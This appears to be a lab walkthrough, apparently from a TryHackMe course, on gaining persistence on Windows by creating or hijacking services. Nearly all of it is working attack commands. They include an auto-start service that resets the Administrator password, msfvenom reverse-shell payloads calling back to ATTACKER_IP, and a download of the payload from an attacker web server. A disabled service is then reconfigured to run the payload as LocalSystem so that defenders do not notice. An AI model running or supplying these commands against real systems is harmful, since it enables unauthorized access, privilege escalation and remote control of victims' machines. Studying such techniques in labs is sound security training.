Abusing Services

Abusing Services

Creating backdoor services

create and start a service named "THMservice" :

sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice

Note: There must be a space after each equal sign for the command to work.

The "net user" command will be executed when the service is started, resetting the Administrator's password to Passwd123. Notice how the service has been set to start automatically (start= auto), so that it runs without requiring user interaction.

Resetting a user's password works well enough, but we can also create a reverse shell with msfvenom and associate it with the created service. Notice, however, that service executables are unique since they need to implement a particular protocol to be handled by the system. If you want to create an executable that is compatible with Windows services, you can use the exe-service format in msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

You can then copy the executable to your target system, say in C:\Windows

python3 -m http.server 80

$URL="http://<ATTACKER_IP>/<payload.exe>"
$PATH="C:\Windows"
Start-BitsTransfer -Source $URL -Destination $Path

point the service's binPath to the backdoored service we have created using msvenom:

sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2

This should create a connection back to your attacker's machine.

Modifying existing services

While creating new services for persistence works quite well, the blue team may monitor new service creation across the network. We may want to reuse an existing service instead of creating one to avoid detection. Usually, any disabled service will be a good candidate, as it could be altered without the user noticing it.

get a list of available services :

sc.exe query state=all

You should be able to find a stopped service called THMService3.

query the service's configuration :

C:\> sc.exe qc THMService3
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: THMService3
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2 AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyService\THMService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : THMService3
        DEPENDENCIES       : 
        SERVICE_START_NAME : NT AUTHORITY\Local Service

There are three things we care about when using a service for persistence:

• The executable (BINARY_PATH_NAME) should point to our payload.

• The service START_TYPE should be automatic so that the payload runs without user interaction.

• The SERVICE_START_NAME, which is the account under which the service will run, should preferably be set to LocalSystem to gain SYSTEM privileges.

creating a new reverse shell with msfvenom :

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=5558 -f exe-service -o rev-svc2.exe

To reconfigure "THMservice3" parameters, we can use the following command:

sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"

• binPath= "C:\Windows\rev-svc2.exe": This sets the binary path for the service to the location "C:\Windows\rev-svc2.exe." This means the service will execute the specified executable when it's started.

• start= auto: This sets the startup type of the service to automatic, which means the service will start automatically when the system boots up.

• obj= "LocalSystem": This sets the account under which the service will run to the "LocalSystem" account. The "LocalSystem" account has high privileges on the system.

You can then query the service's configuration again to check if all went as expected

Start a listener on your attacker's machine and manually start the service to receive a reverse shell.